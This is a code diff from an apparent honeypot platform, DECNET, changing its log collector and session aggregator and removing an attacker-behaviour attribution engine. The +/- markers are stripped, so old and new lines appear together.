def _should_ingest(parsed: dict[str, Any]) -> bool:
"""
Return True if this parsed event should be written to the JSON ingestion
stream. Drops native unix daemon noise (sshd, pam_unix, …) outright;
rate-limits connection-lifecycle events within a dedup window.
stream. Rate-limited connection-lifecycle events return False when another
event with the same (attacker_ip, decky, service, event_type) was emitted
inside the dedup window.
"""
if parsed.get("service", "") in _DROP_APPS:
return False
event_type = parsed.get("event_type", "")
if _RL_WINDOW_SEC <= 0.0 or event_type not in _RL_EVENT_TYPES:
return True
@@ -133,234 +116,6 @@ def _reset_rate_limiter() -> None:
with _rl_lock:
_rl_last.clear()
# ─── Session aggregator (TTP `attacker.session.ended` producer) ──────────────
#
# The TTP worker subscribes to ``attacker.session.ended`` and turns each
# emitted command into a ``source_kind="command"`` :class:`TaggerEvent`
# (see ``decnet/ttp/worker._build_events``). No upstream worker was
# producing that topic — the rule pack therefore never fired on live
# traffic. The aggregator below indexes shell-command events
# per-attacker_ip and emits one ``attacker.session.ended`` envelope
# whenever the SSH ``sessrec`` worker publishes ``session_recorded``.
#
# Memory bound: each attacker_ip's deque is capped by a TTL eviction
# (default 3600 s). Override via ``DECNET_COLLECTOR_SESSION_AGG_TTL_SEC``.
_SESSION_AGG_TTL_SEC: float = _parse_float_env(
"DECNET_COLLECTOR_SESSION_AGG_TTL_SEC", 3600.0,
)
# Body of a bash PROMPT_COMMAND CMD line:
# ``CMD uid=0 user=root src=192.168.1.5 pwd=/root cmd=ls /var/www/html``
# Splits into the structured fields the inspector renders + the
# residual ``cmd=`` value (which may itself contain spaces — preserve
# everything after ``cmd=`` as one token, do NOT word-split).
_CMD_BODY_HEAD_KV_RE = re.compile(r'(\w+)=(\S+)')
def _parse_cmd_msg(msg: str) -> dict[str, str]:
"""Split a bash CMD msg body into ``{uid, user, src, pwd, command}``.
Returns the empty dict on a non-CMD msg. ``command`` carries the
full post-``cmd=`` rest, including any embedded whitespace —
tools like ``nmap -p- 192.168.1.0/24`` would otherwise lose
everything after the first space.
"""
if not msg.startswith("CMD "):
return {}
head, sep, cmd_rest = msg[4:].partition("cmd=")
out: dict[str, str] = {}
for k, v in _CMD_BODY_HEAD_KV_RE.findall(head):
out[k] = v
if sep:
out["command"] = cmd_rest
return out
def _parse_iso_ts(value: str) -> Optional[datetime]:
"""Best-effort ISO-8601 parse for parsed event timestamps.
The collector's parser stamps ``timestamp`` either as the original
ISO-8601 string (when ``datetime.fromisoformat`` failed) or as the
reformatted ``%Y-%m-%d %H:%M:%S`` string. Both round-trip through
``fromisoformat`` after a space→T swap. Returns None if neither
shape parses — the aggregator skips events it can't time-stamp.
"""
if not value:
return None
candidates = (value, value.replace(" ", "T"))
for cand in candidates:
try:
return datetime.fromisoformat(cand)
except ValueError:
continue
return None
class _SessionAggregator:
"""Per-attacker_ip command index that emits ``attacker.session.ended``.
Thread-safe — :meth:`add_event` is called from the per-container
stream threads. Internal state is protected by a single lock; the
publish fan-out happens inside the lock for simplicity (the
downstream publish_fn is the thread-safe marshaller from
:mod:`decnet.bus.publish`, which is non-blocking).
"""
def __init__(
self,
publish_fn: Callable[[str, dict[str, Any], str], None],
*,
ttl_sec: float = _SESSION_AGG_TTL_SEC,
) -> None:
self._publish = publish_fn
self._ttl = ttl_sec
self._lock = threading.Lock()
# attacker_ip → list of (timestamp, parsed_event) tuples.
# Stored as a list rather than a deque so the ``in_window``
# filter can index linearly; the per-attacker volume is
# bounded by the TTL and by typical session size (≤ a few
# hundred commands) so this stays cheap.
self._cmds: dict[str, list[tuple[datetime, dict[str, Any]]]] = {}
def add_event(self, parsed: dict[str, Any]) -> None:
"""Index a parsed event. Emits on ``session_recorded``."""
event_type = parsed.get("event_type", "")
attacker_ip = parsed.get("attacker_ip") or ""
if not attacker_ip or attacker_ip == "Unknown":
return
ts = _parse_iso_ts(str(parsed.get("timestamp", "")))
if ts is None:
return
with self._lock:
self._evict_expired(ts)
if event_type == "command":
self._cmds.setdefault(attacker_ip, []).append((ts, parsed))
return
if event_type == "session_recorded":
self._emit_session(parsed, attacker_ip, ts)
def _evict_expired(self, now: datetime) -> None:
"""Drop commands older than ``self._ttl`` seconds."""
cutoff = now.timestamp() - self._ttl
for ip, entries in list(self._cmds.items()):
kept = [(t, p) for t, p in entries if t.timestamp() >= cutoff]
if kept:
self._cmds[ip] = kept
else:
del self._cmds[ip]
def _emit_session(
self, parsed: dict[str, Any], attacker_ip: str, ended_at: datetime,
) -> None:
"""Build an ``attacker.session.ended`` envelope and publish it.
Slices the per-IP deque to commands whose timestamp falls
inside ``[ended_at - duration_s, ended_at]``. Commands stay in
the deque after the slice — the TTL eviction is the only path
that drops them, so two back-to-back sessions for the same IP
share the visible window without losing rows.
"""
fields = parsed.get("fields", {}) or {}
duration_raw = fields.get("duration_s") or "0"
try:
duration_s = float(duration_raw)
except (TypeError, ValueError):
duration_s = 0.0
sid = str(fields.get("sid") or "")
service = str(fields.get("service") or parsed.get("service") or "")
decky = parsed.get("decky") or ""
commands_window = self._cmds.get(attacker_ip, [])
cutoff_lo = ended_at.timestamp() - max(duration_s, 0.0)
commands: list[dict[str, Any]] = []
for idx, (cmd_ts, cmd_parsed) in enumerate(commands_window):
if cmd_ts.timestamp() < cutoff_lo:
continue
cmd_fields = cmd_parsed.get("fields", {}) or {}
# Pull structured uid/user/src/pwd/command from the bash
# msg body. The inspector renders these as separate
# key/value rows, which is much friendlier than dumping
# the raw ``CMD uid=0 user=... cmd=...`` string into a
# single ``command_text`` blob.
parsed_kv = _parse_cmd_msg(str(cmd_parsed.get("msg", "")))
cmd_text = (
cmd_fields.get("command")
or cmd_fields.get("cmd")
or parsed_kv.get("command")
or cmd_parsed.get("msg", "")
)
entry: dict[str, Any] = {
"id": f"{sid}#{idx}" if sid else f"{attacker_ip}-{cmd_ts.isoformat()}",
"command_text": str(cmd_text),
"ts": cmd_ts.isoformat(),
"decky": cmd_parsed.get("decky", ""),
"service": cmd_parsed.get("service", ""),
}
for key in ("uid", "user", "src", "pwd"):
value = parsed_kv.get(key) or cmd_fields.get(key)
if value is not None:
entry[key] = value
commands.append(entry)
# Resolve the asciinema shard so consumers (notably the BEHAVE-SHELL
# session-ended handler in the profiler worker) don't each have to
# disk-reach independently. Shard fields can be malformed or the
# transcripts dir may not exist yet — find_shard_with_sid returns
# None in those cases and we publish ``shard_path: None`` so the
# consumer skips honestly. Additive field; existing TTP consumers
# ignore it.
shard_path: str | None = None
resolve_error: str | None = None
if sid and decky and service:
try:
resolved = find_shard_with_sid(decky, service, sid)
except (ValueError, OSError, PermissionError) as exc:
resolve_error = f"{type(exc).__name__}: {exc}"
resolved = None
if resolved is not None:
shard_path = str(resolved)
if shard_path is None and sid:
# Loud-by-default — the BEHAVE-SHELL handler will skip
# session.ended events with shard_path=None, so a silent
# miss here means the profiler panel never hydrates. Surface
# the most common failure modes inline so the operator can
# diagnose without grepping decnet/artifacts/shards.py.
#
# 1. ARTIFACTS_ROOT not readable by the collector's user
# (perm 0750 decnet:decnet vs. User=anti without
# SupplementaryGroups=decnet).
# 2. service whitelist (_SERVICE_RE accepts ssh|telnet only).
# 3. sessrec hasn't flushed the shard for this sid yet
# (collector tick won the race; next tick recovers).
logger.warning(
"collector: shard_path=None decky=%s service=%s sid=%s "
"(error=%s) — profiler will skip this session.ended; "
"check ARTIFACTS_ROOT perms / service whitelist",
decky, service, sid, resolve_error or "shard not found",
)
payload: dict[str, Any] = {
"session_id": sid or None,
"attacker_uuid": None, # consumer resolves via repo
"attacker_ip": attacker_ip,
"decky_id": decky,
"service": service,
"ended_at": ended_at.isoformat(),
"duration_s": duration_s,
"commands": commands,
"shard_path": shard_path,
}
topic = _topics.attacker(_topics.ATTACKER_SESSION_ENDED)
try:
self._publish(topic, payload, _topics.ATTACKER_SESSION_ENDED)
except Exception as exc: # noqa: BLE001
logger.debug(
"collector: session.ended publish failed: %s", exc,
)
# ─── RFC 5424 parser ──────────────────────────────────────────────────────────
_RFC5424_RE = re.compile(
@@ -374,27 +129,6 @@ _RFC5424_RE = re.compile(
r"(\S+) " # 4: MSGID (event_type)
r"(.+)$", # 5: SD element + optional MSG
)
# Honeypot SSH containers export a ``PROMPT_COMMAND`` that calls
# ``logger --rfc5424 --msgid command -p user.info -t bash "CMD …"``.
# That inner RFC 5424 line lands on the container's stdout, where the
# Docker stream reader prepends ANOTHER RFC 5424 envelope (PRI=14,
# HOSTNAME=<decky>, APP-NAME=1, MSGID=NIL). The outer parse therefore
# sees ``event_type == "-"`` while the real MSGID (``command``) is
# inside the body. We detect that case and re-extract the inner
# ``HOSTNAME APP-NAME PROCID MSGID rest`` so downstream consumers see
# ``event_type == "command"`` plus the real source hostname.
#
# Anchored on an ISO-8601 timestamp at the head of the body so we
# don't false-match free-form prose like "Connection from 1.2.3.4".
_INNER_RFC5424_RE = re.compile(
r"^(\d{4}-\d{2}-\d{2}T\S+)\s+" # 1: inner TIMESTAMP
r"(\S+)\s+" # 2: inner HOSTNAME
r"(\S+)\s+" # 3: inner APP-NAME
r"\S+\s+" # PROCID (NIL or PID)
r"(\S+)\s+" # 4: inner MSGID
r"(.+)$", # 5: inner SD/MSG remainder
)
_SD_BLOCK_RE = re.compile(r'\[relay@55555\s+(.*?)\]', re.DOTALL)
_PARAM_RE = re.compile(r'(\w+)="((?:[^"\\]|\\.)*)"')
_IP_FIELDS = ("src_ip", "src", "client_ip", "remote_ip", "remote_addr", "target_ip", "ip")
@@ -434,23 +168,8 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
ts_raw, decky, service, event_type, sd_rest = m.groups()
fields: dict[str, str] = {}
# Honeypot SSH PROMPT_COMMAND lines are double-wrapped (Docker
# stdout envelope around the inner ``logger --msgid command`` line).
# Outer MSGID is NIL; the real MSGID is inside the body. Detect
# the inner shape and re-extract HOSTNAME / APP-NAME / MSGID /
# remainder so downstream extraction sees the real header.
if event_type == "-" and sd_rest.startswith("-"):
body = sd_rest[1:].lstrip()
inner = _INNER_RFC5424_RE.match(body)
if inner is not None:
_i_ts, i_host, i_app, i_msgid, i_rest = inner.groups()
decky = i_host
service = i_app
event_type = i_msgid
sd_rest = i_rest
msg: str = ""
if sd_rest.startswith("-"):
msg = sd_rest[1:].lstrip()
elif sd_rest.startswith("["):
@@ -458,28 +177,16 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
if block:
for k, v in _PARAM_RE.findall(block.group(1)):
fields[k] = v.replace('\\"', '"').replace("\\\\", "\\").replace("\\]", "]")
# Always recover the post-SD message tail, even when the SD
# block isn't ``relay@55555`` (e.g. the ``timeQuality`` block
# syslog auto-emits on bash CMD lines). Without this the body
# of unwrapped PROMPT_COMMAND lines stays empty and the
# attacker_ip kv-fallback below has nothing to scan.
msg_match = re.search(r'\]\s+(.+)$', sd_rest)
if msg_match:
msg = msg_match.group(1).strip()
msg_match = re.search(r'\]\s+(.+)$', sd_rest)
if msg_match:
msg = msg_match.group(1).strip()
else:
msg = sd_rest
attacker_ip = "Unknown"
for fname in _IP_FIELDS:
if fname in fields:
raw = fields[fname]
# remote_addr may be "host:port" — split so identity keys on IP only.
host, _, port = raw.rpartition(":")
if host and port.isdigit():
attacker_ip = host.strip("[]") # handle [::1]:port IPv6 form
fields.setdefault("remote_port", port)
else:
attacker_ip = raw
attacker_ip = fields[fname]
break
# Fallback for plain `logger` callers that don't use SD params (notably
@@ -513,12 +220,6 @@ def parse_rfc5424(line: str) -> Optional[dict[str, Any]]:
except ValueError:
ts_formatted = ts_raw
# Free-form bash PROMPT_COMMAND lines (MSGID=NIL, body starts with
# "CMD ") get event_type rewritten to "command". `fields` stays empty
# so the frontend's msg-based pill rendering doesn't double up.
if event_type == "-" and msg.startswith("CMD "):
event_type = "command"
return {
"timestamp": ts_formatted,
"decky": decky,
@@ -645,7 +346,7 @@ def _stream_container(
publish_fn: CollectorPublishFn | None = None,
) -> None:
"""Stream logs from one container and append to the host log files."""
import docker
import docker # type: ignore[import]
lf: Optional[Any] = None
jf: Optional[Any] = None
@@ -715,17 +416,12 @@ def _make_system_log_publisher(
thread can call it unconditionally. Otherwise each call is marshalled
onto *loop* (the asyncio event loop that owns the bus socket) via
``make_thread_safe_publisher``.
The same call also feeds a :class:`_SessionAggregator` so shell
commands are indexed per-attacker_ip and ``attacker.session.ended``
fires whenever the SSH ``sessrec`` worker logs ``session_recorded``.
"""
raw_publish = make_thread_safe_publisher(bus, loop) if bus is not None else None
if raw_publish is None:
return lambda _parsed: None
topic = _topics.system(_topics.SYSTEM_LOG)
aggregator = _SessionAggregator(raw_publish)
def _publish(parsed: dict[str, Any]) -> None:
event_type = parsed.get("event_type", "")
@@ -740,7 +436,6 @@ def _make_system_log_publisher(
},
event_type,
)
aggregator.add_event(parsed)
return _publish
@@ -755,7 +450,7 @@ async def log_collector_worker(log_file: str) -> None:
Watches Docker events to pick up containers started after initial scan.
"""
import docker
import docker # type: ignore[import]
log_path = Path(log_file)
json_path = log_path.with_suffix(".json")

View File

@@ -39,7 +39,6 @@ Shape::
master-host = 10.0.0.1 # required on agents
syslog-port = 6514
swarmctl-port = 8770
swarmctl-host = 127.0.0.1 # bind address for `decnet swarmctl`
[logging]
system-log = /var/log/decnet/decnet.system.log
@@ -121,7 +120,6 @@ _DOMAIN_MAP: dict[str, dict[str, str]] = {
"master-host": "DECNET_SWARM_MASTER_HOST",
"syslog-port": "DECNET_SWARM_SYSLOG_PORT",
"swarmctl-port": "DECNET_SWARMCTL_PORT",
"swarmctl-host": "DECNET_SWARMCTL_HOST",
},
"logging": {
"system-log": "DECNET_SYSTEM_LOGS",

View File

@@ -1,21 +0,0 @@
"""DECNET attribution engine — v0 aggregation library.
Pure library: per-(identity, primitive) state machine over BEHAVE-SHELL
observations. No I/O, no bus, no DB. The bus subscriber and DB writes
live in :mod:`decnet.correlation.attribution_worker` so this package
stays trivially testable with synthetic observation lists.
See ``development/ATTRIBUTION-ENGINE.md`` for the full design and the
explicit bright line: this engine does NOT do persona classification
(HUMAN/LLM/SCRIPTED), does NOT gate access, does NOT attribute to
named persons. It surfaces *behavioural coherence* and *behavioural
drift*, and stops there.
"""
from __future__ import annotations
from decnet.correlation.attribution.aggregate import (
AttributionState,
aggregate_observations,
)
__all__ = ["AttributionState", "aggregate_observations"]

View File

@@ -1,62 +0,0 @@
"""Calibration thresholds for the attribution engine — every magic
number lives here, named, with the calibration source cited.
v0 values are heuristic. Real calibration ships when red-team
exercises produce labelled trace data
(``ATTRIBUTION-ENGINE.md`` §"Out of scope"). Until then these constants
are the engine's only knobs; aggregate.py never embeds a literal.
"""
from __future__ import annotations
# ── Categorical merger ────────────────────────────────────────────────
# Last-N window size for the categorical state machine. 5 calibrates
# against typical session counts (most attackers are observed < 10
# times before they go quiet — ATTRIBUTION-ENGINE.md §"Open question
# 2"). Operators with long-running attackers will want a wider window
# in v1.
CATEGORICAL_WINDOW_N = 5
# Minimum observations before the merger emits anything other than
# ``unknown``. Below this floor the state machine has no signal.
MIN_OBSERVATIONS_FOR_STATE = 3
# Categorical merger is one-outlier-tolerant: in a window of N=5, the
# state is ``stable`` if at least ``MAJORITY_THRESHOLD`` agree.
CATEGORICAL_MAJORITY_THRESHOLD = 4
# ── Numeric merger ────────────────────────────────────────────────────
# EWMA smoothing factor for numeric primitives. 0.3 weights recent
# observations enough to surface drift quickly without flapping on
# single outliers.
NUMERIC_EWMA_ALPHA = 0.3
# Coefficient-of-variation thresholds: dispersion / |mean|.
NUMERIC_STABLE_DISPERSION_PCT = 0.20 # < 20% of mean → stable
NUMERIC_DRIFT_MEAN_SHIFT_PCT = 0.30 # mean moved > 30% → drifting
NUMERIC_CONFLICT_DISPERSION_PCT = 1.0 # > 100% of mean → conflicted
# ── Hash merger ───────────────────────────────────────────────────────
# Rotations within HASH_DRIFT_WINDOW count toward state transitions.
# Below DRIFT_MAX → drifting; above → conflicted. The values mirror the
# DEBT-032 fingerprint-rotation calibration — bumped by one because
# the attribution engine takes one rotation as evidence-of-life, not
# yet evidence-of-drift.
HASH_DRIFT_MAX = 2
HASH_DRIFT_WINDOW_SECS = 24 * 60 * 60 # 24h
# ── Multi-actor cap ───────────────────────────────────────────────────
# multi_actor confidence is capped to keep the dashboard honest about
# how noisy this signal is. ATTRIBUTION-ENGINE.md §"Open question 1":
# flapping primitives on flaky networks look like two operators.
MULTI_ACTOR_MAX_CONFIDENCE = 0.6
# ── Cross-primitive correlator (Phase 5) ──────────────────────────────
# Minimum number of primitives that must independently flag
# ``multi_actor`` for the same identity before
# ``attribution.profile.multi_actor_suspected`` fires.
MULTI_ACTOR_MIN_PRIMITIVES = 2
# Tick interval for the periodic walk in
# :mod:`decnet.correlation.attribution_worker`. Configurable via env
# var in v1; hardcoded in v0.
MULTI_ACTOR_TICK_SECS = 60.0

View File

@@ -1,418 +0,0 @@
"""Per-(identity, primitive) state-machine — the attribution engine's
core merge logic.
Pure: given a list of BEHAVE observations for one
``(identity_uuid, primitive)`` pair (already ordered by ``ts`` ASC),
returns the derived state. No DB, no bus, no I/O. The worker
(``decnet.correlation.attribution_worker``) is responsible for loading
the observations and writing the state row.
State vocabulary is frozen at five values (see
``ATTRIBUTION-ENGINE.md``):
* ``unknown`` — < ``MIN_OBSERVATIONS_FOR_STATE`` observations
* ``stable`` — recent N agree
* ``drifting`` — recent N stable but disagree with older N
* ``conflicted`` — recent N split
* ``multi_actor`` — conflicted + cross-session alternation pattern
Phase 2 ships :func:`_aggregate_categorical` (the dominant ValueKind
for BEHAVE-SHELL primitives). Phase 3 adds numeric + hash mergers and
the ValueKind dispatcher in :func:`aggregate_observations`.
"""
from __future__ import annotations
from collections import Counter
from dataclasses import dataclass
from typing import Any, Sequence
from decnet.correlation.attribution import _thresholds as _T
__all__ = [
"AttributionState",
"aggregate_observations",
"aggregate_categorical",
"aggregate_numeric",
"aggregate_hash",
]
@dataclass(frozen=True)
class AttributionState:
"""Output of the merger for one ``(identity, primitive)`` pair.
The fields map onto :class:`AttributionStateRow` columns; the
worker composes the final dict for ``upsert_attribution_state``
by adding ``identity_uuid`` + ``primitive`` (the merger does not
own the natural key) and a ``last_change_ts`` derived from the
prior row.
"""
current_value: Any
state: str
confidence: float
observation_count: int
last_observation_ts: float
def aggregate_observations(
observations: Sequence[dict[str, Any]],
*,
value_kind: str | None = None,
) -> AttributionState:
"""Run the merger over *observations* and return derived state.
*observations* is a list of dicts with at minimum ``value``,
``ts``, ``confidence`` (matching
``ObservationRow.observations_time_series`` output). Sessions
are derived from the ``ts`` axis — the merger does not need a
separate session id; cross-session alternation is detected by
the gap distribution. Sessions are NOT collapsed before the
merger; ``multi_actor`` reasons over the full per-observation
series.
*value_kind* is a hint from the BEHAVE primitive registry — Phase
2 only honours ``"categorical"`` (or ``None``, treated as
categorical). Phase 3 will dispatch on ``"numeric"`` /
``"hash"`` to the matching merger.
"""
if not observations:
return _unknown(0.0, count=0)
if value_kind in (None, "categorical"):
return aggregate_categorical(observations)
if value_kind == "numeric":
return aggregate_numeric(observations)
if value_kind == "hash":
return aggregate_hash(observations)
raise ValueError(
f"aggregate_observations: unknown value_kind={value_kind!r}; "
"expected 'categorical' | 'numeric' | 'hash' | None",
)
def aggregate_numeric(
observations: Sequence[dict[str, Any]],
) -> AttributionState:
"""Numeric merger — for primitives whose ``value`` is an int /
float (e.g. ``toolchain.c2.beacon_interval_ms``,
``motor.paste_burst_rate``).
Compares the EWMA of the recent window against the EWMA of the
older window; reports dispersion as coefficient of variation.
* < ``MIN_OBSERVATIONS_FOR_STATE`` → ``unknown``
* recent CV < ``NUMERIC_STABLE_DISPERSION_PCT`` *and* mean shift
from older window < ``NUMERIC_DRIFT_MEAN_SHIFT_PCT`` → ``stable``
* mean shifted >= ``NUMERIC_DRIFT_MEAN_SHIFT_PCT`` → ``drifting``
* recent CV > ``NUMERIC_CONFLICT_DISPERSION_PCT`` → ``conflicted``
* otherwise → ``stable`` (falling-through case for moderate
dispersion that hasn't yet become drift)
Confidence on stable/drifting is ``1 - min(CV, 1.0)`` —
tighter dispersion = higher confidence. Conflicted is ``0.5``
by convention; we cannot meaningfully claim certainty in a
statistic computed over a degenerate sample.
``current_value`` is the recent EWMA, not the last raw
observation: numeric primitives are noisy by nature and
surfacing the smoothed estimate keeps the dashboard from
flapping on every tick. ``multi_actor`` is *not* a numeric state
in v0 — bimodal distributions belong to the categorical
detector once the primitive's value space is bucketed.
"""
n = len(observations)
last_ts = float(observations[-1].get("ts", 0.0)) if observations else 0.0
if n < _T.MIN_OBSERVATIONS_FOR_STATE:
return AttributionState(
current_value=_safe_float(observations[-1].get("value")) if n else None,
state="unknown",
confidence=0.0,
observation_count=n,
last_observation_ts=last_ts,
)
window = _T.CATEGORICAL_WINDOW_N
recent_vals = [_safe_float(o.get("value")) for o in observations[-window:]]
older_vals = [
_safe_float(o.get("value"))
for o in observations[-2 * window: -window]
]
recent_mean = _ewma(recent_vals, _T.NUMERIC_EWMA_ALPHA)
recent_cv = _coef_of_variation(recent_vals, recent_mean)
if recent_cv > _T.NUMERIC_CONFLICT_DISPERSION_PCT:
return AttributionState(
current_value=recent_mean,
state="conflicted",
confidence=0.5,
observation_count=n,
last_observation_ts=last_ts,
)
if older_vals:
older_mean = _ewma(older_vals, _T.NUMERIC_EWMA_ALPHA)
denom = abs(older_mean) if older_mean != 0 else 1.0
mean_shift = abs(recent_mean - older_mean) / denom
if mean_shift >= _T.NUMERIC_DRIFT_MEAN_SHIFT_PCT:
return AttributionState(
current_value=recent_mean,
state="drifting",
confidence=max(0.0, 1.0 - min(recent_cv, 1.0)),
observation_count=n,
last_observation_ts=last_ts,
)
return AttributionState(
current_value=recent_mean,
state="stable",
confidence=max(0.0, 1.0 - min(recent_cv, 1.0)),
observation_count=n,
last_observation_ts=last_ts,
)
def aggregate_hash(
observations: Sequence[dict[str, Any]],
) -> AttributionState:
"""Hash merger — for rotation-resistant fingerprints
(``toolchain.tls.jarm_server``, ``toolchain.ssh.hassh_client``).
The merger does NOT recompute hashes; DEBT-032
(``decnet.correlation.fingerprint_rotation``) already produces
one observation per rotation event. The state machine counts
distinct hash values inside ``HASH_DRIFT_WINDOW_SECS`` of the
most recent observation:
* 0 rotations (single hash, any count) → ``stable``
* 1 to ``HASH_DRIFT_MAX`` rotations within window → ``drifting``
* > ``HASH_DRIFT_MAX`` rotations within window → ``conflicted``
``unknown`` fires only on empty input — a single hash with one
observation is enough signal to say "stable", because hashes
don't have a noisy baseline the way categorical/numeric
primitives do.
``current_value`` is the most recent hash. Confidence is
``1 / (1 + rotations_in_window)`` — one rotation halves
confidence, two thirds it, etc.
"""
n = len(observations)
if n == 0:
return _unknown(0.0, count=0)
last_ts = float(observations[-1].get("ts", 0.0))
last_value = observations[-1].get("value")
window_start = last_ts - _T.HASH_DRIFT_WINDOW_SECS
in_window = [
o for o in observations
if float(o.get("ts", 0.0)) >= window_start
]
distinct = len({o.get("value") for o in in_window if o.get("value") is not None})
rotations = max(0, distinct - 1)
confidence = 1.0 / (1.0 + rotations)
if rotations == 0:
state = "stable"
elif rotations <= _T.HASH_DRIFT_MAX:
state = "drifting"
else:
state = "conflicted"
return AttributionState(
current_value=last_value,
state=state,
confidence=confidence,
observation_count=n,
last_observation_ts=last_ts,
)
def _ewma(values: Sequence[float], alpha: float) -> float:
"""Single-pass EWMA. Empty input is illegal; callers gate on
``MIN_OBSERVATIONS_FOR_STATE`` upstream."""
it = iter(values)
smoothed = next(it)
for v in it:
smoothed = alpha * v + (1.0 - alpha) * smoothed
return smoothed
def _coef_of_variation(values: Sequence[float], mean: float) -> float:
"""Population-style CV = stdev / |mean|. Returns 0 on a constant
signal; returns +inf-equivalent (1e9) when the mean is exactly
zero and the signal isn't constant — so the conflicted threshold
fires without us having to special-case it upstream."""
if not values:
return 0.0
diffs_sq = [(v - mean) ** 2 for v in values]
variance = sum(diffs_sq) / len(values)
stdev = variance ** 0.5
if mean == 0:
return 0.0 if stdev == 0 else 1e9
return stdev / abs(mean)
def _safe_float(value: Any) -> float:
"""Defensive coercion — observations may carry value=None on
unknown-emitter primitives. Treat None as 0.0; the dispersion
check will surface the resulting flat baseline as 'stable'
which is the honest answer for a single-observation primitive
that hasn't fired yet."""
if value is None:
return 0.0
if isinstance(value, bool):
return 1.0 if value else 0.0
return float(value)
def aggregate_categorical(
observations: Sequence[dict[str, Any]],
) -> AttributionState:
"""Categorical merger — the dominant case for BEHAVE-SHELL.
Compares the recent N-window against the older N-window. With
``CATEGORICAL_WINDOW_N = 5`` and ``CATEGORICAL_MAJORITY_THRESHOLD
= 4``:
* fewer than ``MIN_OBSERVATIONS_FOR_STATE`` → ``unknown``
* recent window has a clear majority + matches older window → ``stable``
* recent window has a clear majority + differs from older window → ``drifting``
* recent window split + alternation pattern across observations → ``multi_actor``
* recent window split + no alternation → ``conflicted``
Confidence is the recent-window agreement ratio; ``multi_actor``
is capped at ``MULTI_ACTOR_MAX_CONFIDENCE``. The merger returns
the most-recent observation's value as ``current_value``
regardless of state — the dashboard wants a value to render
even on ``conflicted`` rows.
"""
n = len(observations)
last_ts = float(observations[-1].get("ts", 0.0))
last_value = observations[-1].get("value")
if n < _T.MIN_OBSERVATIONS_FOR_STATE:
return AttributionState(
current_value=last_value,
state="unknown",
confidence=0.0,
observation_count=n,
last_observation_ts=last_ts,
)
window = _T.CATEGORICAL_WINDOW_N
recent = observations[-window:]
recent_values = [o.get("value") for o in recent]
recent_count = Counter(recent_values)
top_value, top_count = recent_count.most_common(1)[0]
recent_size = len(recent)
confidence = top_count / recent_size
is_recent_clear = top_count >= min(
_T.CATEGORICAL_MAJORITY_THRESHOLD, recent_size,
)
if not is_recent_clear:
# Split recent window. Distinguish multi_actor (alternation)
# from random conflict.
if _is_alternation(observations):
return AttributionState(
current_value=last_value,
state="multi_actor",
confidence=min(confidence, _T.MULTI_ACTOR_MAX_CONFIDENCE),
observation_count=n,
last_observation_ts=last_ts,
)
return AttributionState(
current_value=last_value,
state="conflicted",
confidence=confidence,
observation_count=n,
last_observation_ts=last_ts,
)
# Recent window has a clear majority. Compare to the prior
# window to decide stable vs drifting.
older = observations[-2 * window: -window]
if not older:
# Only one window's worth of data — call it stable. The
# dashboard already gates "unknown" on
# MIN_OBSERVATIONS_FOR_STATE so this branch is reachable
# only when the operator has produced enough observations
# for one full window but not two.
return AttributionState(
current_value=top_value,
state="stable",
confidence=confidence,
observation_count=n,
last_observation_ts=last_ts,
)
older_values = [o.get("value") for o in older]
older_count = Counter(older_values)
older_top_value, older_top_count = older_count.most_common(1)[0]
older_size = len(older)
older_clear = older_top_count >= min(
_T.CATEGORICAL_MAJORITY_THRESHOLD, older_size,
)
if not older_clear:
# Older window was itself conflicted; we just stabilised.
# That's drift in the colloquial sense — the attacker
# converged onto a single behaviour.
return AttributionState(
current_value=top_value,
state="drifting",
confidence=confidence,
observation_count=n,
last_observation_ts=last_ts,
)
if older_top_value != top_value:
return AttributionState(
current_value=top_value,
state="drifting",
confidence=confidence,
observation_count=n,
last_observation_ts=last_ts,
)
return AttributionState(
current_value=top_value,
state="stable",
confidence=confidence,
observation_count=n,
last_observation_ts=last_ts,
)
def _is_alternation(observations: Sequence[dict[str, Any]]) -> bool:
"""Heuristic: do recent observations alternate between two values
(operator A → B → A → B), as opposed to random thrashing?
Conservative: requires at least 4 observations in the window,
exactly 2 distinct values, and that flips outnumber repeats by
at least 2:1. ATTRIBUTION-ENGINE.md §"Open question 1" warns
that flapping primitives on flaky networks look like two
operators; this guard is what keeps the false-positive rate down.
"""
window = _T.CATEGORICAL_WINDOW_N
recent = observations[-window:]
if len(recent) < 4:
return False
values = [o.get("value") for o in recent]
distinct = set(values)
if len(distinct) != 2:
return False
flips = sum(
1 for i in range(1, len(values)) if values[i] != values[i - 1]
)
repeats = (len(values) - 1) - flips
return flips >= 2 * max(repeats, 1)
def _unknown(last_ts: float, *, count: int) -> AttributionState:
return AttributionState(
current_value=None,
state="unknown",
confidence=0.0,
observation_count=count,
last_observation_ts=last_ts,
)

View File

@@ -1,394 +0,0 @@
"""Attribution-engine bus subscriber — v0 Phase 1 skeleton.
Subscribes to ``attacker.observation.>`` and, for each event, ensures
the source attacker has a stub identity in ``attacker_identities``.
Phase 1 does **not** invoke the merger or write
``attribution_state`` rows; that wiring lands in Phase 4 once the
Phase 2/3 mergers are in.
Pattern mirrors :mod:`decnet.correlation.reuse_worker`: bus-subscribe
with a wake event, fall back to poll-only if the bus is unavailable,
publish derived events with :func:`publish_safely`, log per-handler
exceptions and continue.
Trigger isolation: the per-event handler is wrapped in a single
try/except. Any exception is logged and the loop continues with the
next event. This is the same posture BEHAVE-SHELL's
``_handler.handle_session_ended`` adopts.
"""
from __future__ import annotations
import asyncio
import contextlib
from typing import Any
from decnet.bus import topics as _topics
from decnet.bus.base import BaseBus
from decnet.bus.factory import get_bus
from decnet.bus.publish import (
publish_safely,
run_control_listener_signal as _run_control_listener_signal,
run_health_heartbeat as _run_health_heartbeat,
)
from decnet.correlation.attribution import _thresholds as _T
from decnet.correlation.attribution.aggregate import aggregate_observations
from decnet.logging import get_logger
from decnet.web.db.repository import BaseRepository
try:
from behave_shell.spec import (
PRIMITIVE_REGISTRY,
ValueKind,
)
_BEHAVE_REGISTRY_AVAILABLE = True
except ImportError: # pragma: no cover
PRIMITIVE_REGISTRY = {}
ValueKind = None
_BEHAVE_REGISTRY_AVAILABLE = False
log = get_logger("correlation.attribution_worker")
_WORKER_NAME = "attribution"
_OBSERVATION_PATTERN = f"{_topics.ATTACKER}.{_topics.ATTACKER_OBSERVATION_PREFIX}.>"
async def run_attribution_loop(
repo: BaseRepository,
*,
shutdown: asyncio.Event | None = None,
multi_actor_tick_secs: float | None = None,
) -> None:
"""Run the attribution worker until cancelled.
